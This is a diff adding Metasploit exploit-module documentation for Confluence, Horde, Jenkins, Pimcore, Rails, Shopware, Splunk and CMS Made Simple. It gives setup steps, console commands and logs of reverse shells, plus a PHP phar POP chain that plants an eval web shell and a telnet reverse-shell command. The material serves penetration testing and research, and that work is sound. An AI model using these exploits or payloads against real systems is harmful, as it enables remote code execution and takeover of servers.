+[*] Sending stage (38247 bytes) to 192.168.2.59
+[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:59932) at 2019-03-19 23:27:07 +0100
+[!] Tried to delete ./06wp7Fen.php, unknown result
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/cmsms_showtime2_rce) > 
+```
@@ -0,0 +1,163 @@
+# Description
+
+This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro before 6.14.2 to execute arbitrary code (CVE-2019-3396). No authentication is required to exploit this vulnerability.
+
+The vulnerability exists in the Widget Connector Macro which allow inject the "\_template" from the outside for some services, such as Youtube, Viddler, DailyMotion, etc.
+
+The module has been tested with on Atlassian Confluence 6.6.12, 6.8.2, 6.12.0 and 6.13.0 using Java, Windows and Linux meterpreter payload.
+
+References:
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
+https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html
+
+# Vulnerable Application
+Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2.
+
+# Verification Steps
+
+List the steps needed to make sure this thing works
+
+- [ ] Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/confluence_widget_connector`
+- [ ] `set RHOST <IP>`
+- [ ] `set RPORT <PORT>`
+- [ ] `set SRVHOST <HOST_IP>`
+- [ ] `check`
+- [ ] You should see `The target is vulnerable`
+- [ ] `exploit`
+- [ ] You should get a meterpreter session.
+
+# Options
+- **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
+- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=dQw4w9WgXcQ" is the default)
+
+# Scenario
+## Tested on Confluence 6.8.2 with Windows target
+```
+msf5 > use exploit/multi/http/confluence_widget_connector
+msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
+RHOST => target.com
+msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
+RPORT => 8090
+msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
+SRVHOST => 192.168.0.1
+msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows
+TARGET => Windows
+msf5 exploit(multi/http/confluence_widget_connector) > check
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+[+] target.com:8090 - The target is vulnerable.
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 192.168.0.1:4444
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+msf5 exploit(multi/http/confluence_widget_connector) >
+[*] target.com:8090 - Target being detected as: Windows 10
+[*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe
+[*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
+[*] target.com:8090 - Attempting to execute C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
+[*] Sending stage (179779 bytes) to target.com
+[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:62528) at 2019-04-11 03:13:37 +0000
+[*] target.com:8090 - Waiting for exploit to complete...
+[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target
+[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] target.com - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/confluence_widget_connector) >
+```
+
+## Tested on Confluence 6.8.2 with Java target
+```
+msf5 > use exploit/multi/http/confluence_widget_connector
+msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
+RHOST => target.com
+msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
+RPORT => 8090
+msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
+SRVHOST => 192.168.0.1
+msf5 exploit(multi/http/confluence_widget_connector) > check
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+[+] target.com:8090 - The target is vulnerable.
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 192.168.0.1:4444
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+msf5 exploit(multi/http/confluence_widget_connector) >
+[*] target.com:8090 - Target being detected as: Linux
+[*] target.com:8090 - Attempting to upload  /opt/atlassian/confluence/temp/EjpPf.jar
+[*] target.com:8090 - Attempting to execute  /opt/atlassian/confluence/temp/EjpPf.jar
+[*] Sending stage (53866 bytes) to target.com
+[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
+[+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar
+[*] target.com:8090 - Waiting for exploit to complete...
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: confluence
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] target.com - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/confluence_widget_connector) >
+```
+
+## Tested on Confluence 6.8.2 with Linux target
+```
+msf5 > use exploit/multi/http/confluence_widget_connector
+msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
+RHOST => target.com
+msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
+RPORT => 8090
+msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
+SRVHOST => 192.168.0.1
+msf5 exploit(multi/http/confluence_widget_connector) > check
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+[+] target.com:8090 - The target is vulnerable.
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 192.168.0.1:4444
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+msf5 exploit(multi/http/confluence_widget_connector) >
+[*] target.com:8090 - Target being detected as: Linux
+[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD
+[*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt
+[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/dESMnt
+[*] Sending stage (985320 bytes) to target.com
+[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
+[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/BYHzD
+[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt
+[*] target.com:8090 - Waiting for exploit to complete...
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: uid=1001, gid=1001, euid=1001, egid=1001
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] target.com - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/confluence_widget_connector) >
+```
@@ -0,0 +1,101 @@
+Horde Groupware Webmail is a popular open-source groupware platform written in PHP. A vulnerability allows an authenticated, unprivileged user to create a malicious PHP file under the web root and gain arbitrary code execution on the server. 
+
+## Vulnerable Application
+
+The Horde subcomponent Horde Form < 2.0.19 is affected. This module was specifically tested against Horde Groupware Webmail Edition 5.2.22 and 5.2.17 with Horde Form 2.0.18 installed with PEAR on Debian.
+
+### Docker install on Ubuntu 18.04
+
+Please folow these steps to setup a vulnerable version of Horde in Docker on a Ubuntu.
+
+1. Set up a [Ubuntu](http://www.ubuntu.com/) 18.04 box.
+2. Open a terminal, and enter: ```sudo apt-get install docker.io```. Make sure Docker is properly configured and your current user has permession to use it.
+3. Enter: ```mkdir horde_form_file_upload``` to create a folder.
+4. Enter: ```cd horde_form_file_upload``` to enter that folder.
+5. Create a ```Dockerfile``` in it with the following content.
+
+```
+FROM debian
+
+RUN apt-get update
+RUN apt-get install --yes --no-install-recommends \
+    apache2 \
+    ca-certificates \
+    dovecot-imapd \
+    libapache2-mod-php \
+    mysql-server \
+    php-mysqli \
+    php-pear \
+    rsyslog
+
+RUN pear upgrade PEAR
+RUN pear channel-discover pear.horde.org
+RUN pear install horde/horde_role
+RUN rm -r /var/www/html/ && mkdir /var/www/html/
+RUN echo /var/www/html/ | pear run-scripts horde/Horde_Role
+RUN pear install -a -B horde/webmail-5.2.22
+# Uninstall end reinstall the vulnerable version
+RUN pear uninstall -n horde/Horde_Form
+RUN pear install -a -B horde/Horde_Form-2.0.18 
+RUN sed -i "/'secure' => 'tls',/d" /var/www/html/imp/config/backends.php
+RUN chown -R www-data:www-data /var/www/html/
+
+RUN useradd -m -G mail user && echo 'user:user' | chpasswd
+
+RUN echo 'disable_plaintext_auth = no' | tee /etc/dovecot/conf.d/99-auth.conf
+
+ENTRYPOINT \
+           /etc/init.d/mysql start && \
+           echo 'CREATE DATABASE IF NOT EXISTS horde;' | mysql && \
+           echo 'CREATE USER IF NOT EXISTS horde;' | mysql && \
+           echo 'GRANT ALL ON horde.* TO horde IDENTIFIED BY "horde";' | mysql && \
+           { echo mysqli;    sleep 0.3; \
+             echo horde;     sleep 0.3; \
+             echo horde;     sleep 0.3; \
+             echo tcp;       sleep 0.3; \
+             echo localhost; sleep 0.3; \
+             echo;           sleep 0.3; \
+             echo horde;     sleep 0.3; \
+             echo;           sleep 0.3; \
+             echo false;     sleep 0.3; \
+             echo;           sleep 0.3; \
+             echo 1;         sleep 0.3; } | webmail-install && \
+           dovecot && \
+           /etc/init.d/apache2 start && \
+           tail -F /var/log/apache2/access.log /var/log/syslog
+```
+
+6. Enter: ```docker build . -t horde-img``` to build the Docker image.
+7. Enter: ```docker run -p8888:80 --name horde-inst horde-img``` to run the Docker instance with the name ```horde-inst```.
+8. Get the Docker host ip for reverse connection. In Linux, enter: ```ip -4 addr show docker0 | grep -Po 'inet \K[\d.]+'```.
+
+## Verification Steps
+
+After setting up Horde, you can use your exploit module:
+
+1. Start msfconsole
+2. Do: ```use exploit/multi/http/horde_form_file_upload```
+3. Do: ```set RHOSTS 127.0.0.1```
+4. Do: ```set RPORT 8888```
+5. Do: ```set payload php/meterpreter/reverse_tcp```
+6. Do: ```set LHOST [HOST IP]```
+7. Do: ```set VHOST horde.lab```
+8. Do: ```set USERNAME user ```
+9. Do: ```set PASSWORD user```
+10. Do: ```exploit```
+11. And you should get a session
+
+## Scenarios
+
+### Horde Groupware Webmail Edition 5.2.22 with Horde Form 2.0.18 on a Debian stretch on Docker running on an Ubuntu 16.04
+
+```
+msf exploit(multi/http/horde_form_file_upload) > exploit
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Uploading payload to ../var/www/html/static/mxkyfrlztogn.php
+[*] Sending stage (38247 bytes) to 172.17.0.3
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:47720) at 2019-03-29 15:27:53 +0000
+
+meterpreter > 
+```
@@ -0,0 +1,88 @@
+## Intro
+
+This module exploits a vulnerability in Jenkins dynamic routing to
+bypass the `Overall/Read` ACL and leverage Groovy metaprogramming to
+download and execute a malicious JAR file.
+
+When the `Java Dropper` target is selected, the original entry point
+based on `classLoader.parseClass` is used, which requires the use of
+Groovy metaprogramming to achieve RCE.
+
+When the `Unix In-Memory` target is selected, a newer, higher-level,
+and more universal entry point based on `GroovyShell.parse` is used.
+This permits the use of in-memory arbitrary command execution.
+
+The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
+on later versions of Jenkins.
+
+Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
+
+## Setup
+
+1. `git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc`
+2. `cd cve-2019-1003000-jenkins-rce-poc/sample-vuln`
+3. Edit `run.sh` and change `2.152-alpine` to `2.137`
+4. `./run.sh`
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Unix In-Memory
+1   Java Dropper
+```
+
+## Options
+
+**RPORT**
+
+Set this to the Jenkins port. The default is 8080.
+
+**TARGETURI**
+
+Set this to the Jenkins base path. The default is `/`.
+
+**SRVPORT**
+
+Set this to the port on which to serve the payload. Change it from 8080
+to something like 8081 if you are testing Jenkins locally on port 8080.
+
+This option is valid only for the `Java Dropper` target.
+
+**ForceExploit**
+
+Set this to `true` to override the `check` result during exploitation.
+
+## Usage
+
+```
+msf5 exploit(multi/http/jenkins_metaprogramming) > run
+
+[*] Started HTTPS reverse handler on https://192.168.1.2:8443
+[*] Jenkins 2.137 detected
+[+] Jenkins 2.137 is a supported target
+[+] ACL bypass successful
+[*] Using URL: http://0.0.0.0:8081/
+[*] Local IP: http://192.168.1.2:8081/
+[*] Configuring Java Dropper target
+[*] Sending Jenkins and Groovy go-go-gadgets
+[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
+[-] Sending 404
+[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
+[+] Sending 200
+[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
+[+] Sending payload JAR
+[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
+[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
+[*] Server stopped.
+[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target
+
+meterpreter > getuid
+Server username: jenkins
+meterpreter > sysinfo
+Computer    : 6f21b8da2915
+OS          : Linux 4.9.93-linuxkit-aufs (amd64)
+Meterpreter : java/linux
+meterpreter >
+```
@@ -0,0 +1,110 @@
+## Description
+
+This module exploits a PHP (unserialize()) in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability.
+
+The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method make it possible to exploit the unserialize function when passing untrusted values in "data" parameter.
+
+Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.6.6 with the Symfony unserialize payload.
+
+Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.
+
+## Vulnerable Application
+
+Affecting Pimcore, version 5.x <= 5.6.6 and 4.x.
+
+## Verification Steps
+
+Set up a default installation of Pimcore 4.x or 5.x (e.g.: `composer create-project pimcore/skeleton my-project` for the 5.x branch) as described on [Pimcore Installation documentation](https://pimcore.com/docs/5.x/Development_Documentation/Getting_Started/Installation.html) then:
+
+1. Start `msfconsole`
+2. `use exploit/multi/http/pimcore_unserialize_rce`
+3. `set RHOST <IP>`
+4. `set USERNAME <USERNAME>`
+5. `set PASSWORD <PASSWORD>`
+6. `check`
+7. You should see `The target service is running, but could not be validated.`
+8. `exploit`
+9. You should get a meterpreter session!
+
+## Options
+
+* **TARGETURI**: Path to Pimcore installation (“/” is the default)
+* **USERNAME**: Username to authenticate with
+* **PASSWORD**: Password to authenticate with
+
+## Scenario
+
+### Tested on Pimcore 5.6.6
+
+```
+msf5 > use exploit/multi/http/pimcore_unserialize_rce 
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com
+rhost => target.com
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8566
+rport => 8566
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin
+username => admin
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set password pimcore
+password => pimcore
+msf5 exploit(multi/http/pimcore_unserialize_rce) > check
+[*] 192.168.2.59:8566 - The target service is running, but could not be validated.
+msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.8.2:4444 
+[+] Authentication successful: admin:pimcore
+[*] Pimcore version: 5.6.6
+[*] Pimcore build: 9722d19576f9e49969d4a3708e045fa481eaad02
+[+] The target is vulnerable!
+[+] JSON paylod uploaded successful: /var/www/html/var/tmp/bulk-import.tmp
+[*] Selected payload: Pimcore 5.x (Symfony unserialize payload)
+[*] Sending stage (38247 bytes) to 192.168.2.59
+[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:34128) at 2019-04-07 12:04:08 +0200
+[!] This exploit may require manual cleanup of '/var/www/html/var/tmp/bulk-import.tmp' on the target
+
+meterpreter > 
+[+] Deleted /var/www/html/var/tmp/bulk-import.tmp
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/pimcore_unserialize_rce) > 
+```
+
+### Tested on Pimcore 4.6.5
+
+```
+msf5 > use exploit/multi/http/pimcore_unserialize_rce 
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com
+rhost => target.com
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8465
+rport => 8465
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin
+username => admin
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set password P1mc0r3_4dm1n
+password => P1mc0r3_4dm1n
+msf5 exploit(multi/http/pimcore_unserialize_rce) > check
+[*] 192.168.2.59:8465 - The target service is running, but could not be validated.
+msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.8.2:4444 
+[+] Authentication successful: admin:P1mc0r3_4dm1n
+[*] Pimcore version: 4.6.5
+[*] Pimcore build: 4123
+[+] The target is vulnerable!
+[+] JSON paylod uploaded successful: /var/www/html/website/var/system/bulk-import.tmp
+[*] Selected payload: Pimcore 4.x (Zend unserialize payload)
+[*] Sending stage (38247 bytes) to 192.168.2.59
+[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:57882) at 2019-04-07 12:00:20 +0200
+[+] Deleted /var/www/html/website/var/system/bulk-import.tmp
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/pimcore_unserialize_rce) > 
+```
@@ -0,0 +1,105 @@
+# Ruby on Rails DoubleTap Development Mode secret_key_base Vulnerability
+
+## Background
+
+Ruby on Rails is a server-side web application framework written in Ruby. It is a model-view-controller (MVC) architecture, providing default structures for a database, a web service, and web pages. It is also a popular choice of framework among well known services and products such as Github, Bloomberg, Soundcloud, Groupon, Twitch.tv, and of course, Rapid7s Metasploit.
+
+In development mode, Ruby on Rails versions including 5.2.2 and prior are vulnerable to a remote code execution vulnerability due to a predictable secret_key_base based on the name of the Rails application, and use it to create a signed serialized payload, and gain remote code execution.
+
+## Vulnerable Setup
+
+In order to set up a vulnerable box for testing, do this on a Linux machine (such as Ubuntu), and assuming you already have rvm installed:
+
+```
+$ rvm gemset create test
+$ rvm gemset use test
+$ gem install rails '5.2.1'
+$ rails new demo
+```
+
+Next, `cd` to demo, and then modify the Gemfile like this:
+
+```
+$ echo "gem 'rails', '5.2.1'" >> Gemfile
+$ echo "gem 'sqlite3', '~> 1.3.6', '< 1.4'" >> Gemfile
+$ echo "source 'https://rubygems.org'" >> Gemfile
+$ bundle
+```
+
+Next, add a new controller:
+
+```
+rails generate controller metasploit
+```
+
+And add the index method for that controller (under app/controllers/metasploit_controllers.rb):
+
+```
+class MetasploitController < ApplicationController
+  def index
+    render file: "#{Rails.root}/test.html"
+  end
+end
+```
+
+In the root directory, add a new test.html:
+
+```
+echo Hello World > test.html
+```
+
+Also, add that new route in config/routes.rb:
+
+```
+Rails.application.routes.draw do
+  resources :metasploit
+end
+```
+
+And finally, start the application (since no mode is specified, by default, it is development mode):
+
+```
+rails s -b 0.0.0.0
+```
+
+## Demonstration
+
+### Server
+
+```
+$ rails server -b 0.0.0.0 
+=> Booting Puma
+=> Rails 5.2.1 application starting in development 
+=> Run `rails server -h` for more startup options
+Puma starting in single mode...
+* Version 3.12.1 (ruby 2.6.0-p0), codename: Llamas in Pajamas
+* Min threads: 5, max threads: 5
+* Environment: development
+* Listening on tcp://0.0.0.0:3000
+Use Ctrl-C to stop
+```
+
+### Metasploit
+
+```
+msf5 exploit(multi/http/rails_double_tap) > check
+[+] 172.16.249.141:3000 - The target is vulnerable.
+msf5 exploit(multi/http/rails_double_tap) > exploit
+
+[*] Started reverse TCP handler on 172.16.249.1:4444 
+[*] Attempting to retrieve the application name...
+[*] The application name is: Demo
+[*] Stager ready: 433 bytes
+[*] Sending serialized payload to target (1250 bytes)
+[*] Sending stage (985320 bytes) to 172.16.249.141
+[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.141:62572) at 2019-04-25 16:29:43 -0500
+[+] Deleted /tmp/LsvSGK.bin
+[+] Deleted /tmp/tSJfp.bin
+
+meterpreter > getuid
+Server username: uid=1000, gid=1000, euid=1000, egid=1000
+meterpreter > pwd
+/home/sinn3r/demo
+meterpreter >
+```
+
@@ -0,0 +1,117 @@
+## Background
+
+Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..
+
+In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by [@KarimOuerghemmi](https://twitter.com/KarimOuerghemmi) of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to the ability of leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.
+
+This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
+
+## Vulnerable Application
+
+The following is the exact setup I used to test and analyze the vulnerability:
+
+- Debian GNU/Linux 9 (stretch) x64
+- MariaDB latest
+- Apache2 w/ mod rewrite / PHP 7.2.15 w/ zip, gd, ctype, curl, dom, hash, iconv, json, session, mbstring, simplexml, xml, pdo_mysql and fileinfo
+
+For installation instructions, please refer to the [Shopware installation guide](https://github.com/shopware/shopware#installation-via-git).
+
+## References
+
+- [https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/](https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/)
+
+## Notes
+
+The recommended CVSS score is 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
+
+## POP Chain
+
+In order to pivot from an object instantiation bug to a object injection primitive, we need something worth while deserializing:
+
+```php
+<?php
+
+namespace GuzzleHttp\Cookie;
+
+// pop chain
+interface ToArrayInterface {}
+
+class SetCookie implements ToArrayInterface {
+    private $data;
+
+    public function __construct(array $data = []){
+        $this->data = $data;
+    }
+}
+
+class CookieJar implements ToArrayInterface {
+    private $cookies;
+
+    public function setCookie(SetCookie $cookie){
+        $this->cookies = array($cookie);
+    }
+}
+
+class FileCookieJar extends CookieJar {
+    private $filename;
+
+    public function __construct($bd_file){
+        $this->filename = $bd_file;
+        $this->setCookie(new SetCookie(array(
+            "Value" => '<?php eval(base64_decode($_SERVER[HTTP_SI])); ?>',
+            "Expires" => true,
+            "Discard" => false,
+        )));
+    }
+}
+
+$phar = new \Phar('poc.phar');
+$phar->startBuffering();
+$phar->addFromString('test.txt', 'test');
+$phar->setStub('<?php __HALT_COMPILER(); ? >');
+$o = new FileCookieJar("/var/www/html/media/image/si.php");
+$phar->setMetadata($o);
+$phar->stopBuffering();
+?>
+```
+
+## Credit
+
+Steven Seeley (mr_me) of Source Incite
+
+## Demo
+
+```
+saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/shopware.rc 
+[*] Processing scripts/shopware.rc for ERB directives.
+resource (scripts/shopware.rc)> use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
+resource (scripts/shopware.rc)> set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+resource (scripts/shopware.rc)> set LHOST 192.168.23.1
+LHOST => 192.168.23.1
+resource (scripts/shopware.rc)> set RHOSTS 192.168.23.164
+RHOSTS => 192.168.23.164
+resource (scripts/shopware.rc)> set RPORT 8080
+RPORT => 8080
+resource (scripts/shopware.rc)> check
+[+] 192.168.23.164:8080 - The target is vulnerable.
+resource (scripts/shopware.rc)> exploit
+[*] Started reverse TCP handler on 192.168.23.1:4444 
+[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=lpmck6d7nrh23ki2fsgeopci3p;
+[+] Stage 2 - leaked the webroot: /var/www/html
+[+] Stage 3 - leaked the CSRF token: SRJELMCxJfEr2RiMlqS8xmOdidI5Hr
+[+] Stage 4 - generated our phar
+[+] Stage 5 - uploaded phar
+[+] Stage 6 - leaked phar location: media/image/6b/7e/0c/eiuzuoii.jpg
+[+] Stage 7 - triggered object instantiation!
+[*] Sending stage (38247 bytes) to 192.168.23.174
+[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:34190) at 2019-05-09 21:11:50 -0500
+[+] Deleted rguktpcw.php
+[+] Deleted image/6b/7e/0c/eiuzuoii.jpg
+
+meterpreter > sysinfo
+Computer    : 45835d649528
+OS          : Linux 45835d649528 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
@@ -0,0 +1,244 @@
+## Vulnerable Application
+
+This module exploits a feature of Splunk whereby a custom application can be
+uploaded through the web based interface. Through the `script` search command a
+user can call commands defined in their custom application which includes arbitrary
+perl or python code. To abuse this behavior, a valid Splunk user with the admin
+role is required. By default, this module uses the credential of "admin:changeme",
+the default Administrator credential for Splunk.
+Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. 
+This module has been tested successfully against:
+
+* 5.0 ([Ubuntu 10.04](https://github.com/rapid7/metasploit-framework/pull/1138#issue-3277564), [Windows XP and Windows Server 2003 SP2](https://github.com/rapid7/metasploit-framework/pull/1138#issue-3277564) with splunk-5.0.1-143156)
+* 6.1, 6.1.1
+* 7.2.4 (OSX 10.14.3, Windows 10 10.0.17134.1, CentOS7 3.10.0-957.1.3.el7.x86_64)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use exploit/multi/http/splunk_upload_app_exec```
+  3. Set required variables (you will need admin credentials)
+  4. Do: ```SET LHOST [ip]```
+  5. Do: ```SET RHOST [ip]```
+  6. Set a payload: 
+     * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected.
+     * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected.
+
+  7. You should get either a reverse shell on port 4444 via the predefined handler (Linux/OSX) or a new user in case (windows target)
+
+## External Demo
+* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html) 
+
+* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
+
+* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+
+## Options
+
+  **EnableOverwrite**
+  Overwrites an app of the same name. Needed if you change the app code in the tgz.
+  Default is `false`
+  
+  **USERNAME**
+  Username for Splunk. Default is `admin`
+  
+  **PASSWORD**
+   Default is `changeme`
+
+## Scenarios
+
+### Tested against 7.2.4 running on OSX 10.14.3
+
+  ```
+msf5 exploit(multi/http/splunk_upload_app_exec) >
+msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1
+RHOST => 172.16.165.1
+msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk
+password => splunksplunk
+msf5 exploit(multi/http/splunk_upload_app_exec) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Automatic
+   1   Splunk >= 7.2.4 / Linux
+   2   Splunk >= 7.2.4 / Windows
+   3   Splunk >= 7.2.4 / OSX
+   4   Splunk >= 5.0.1 / Linux
+   5   Splunk >= 5.0.1 / Windows
+
+
+msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3
+target => 3
+msf5 exploit(multi/http/splunk_upload_app_exec) > exploit
+
+[*] Started reverse TCP double handler on 172.16.165.206:4444
+[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)'
+[*] Authenticating...
+[*] Fetching state token from /en-US/manager/appinstall/_upload
+[*] Uploading file upload_app_exec.tgz
+[+] upload_app_exec successfully uploaded
+[*] Invoking script command
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo 8kNbt70jYB3aJKPm;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
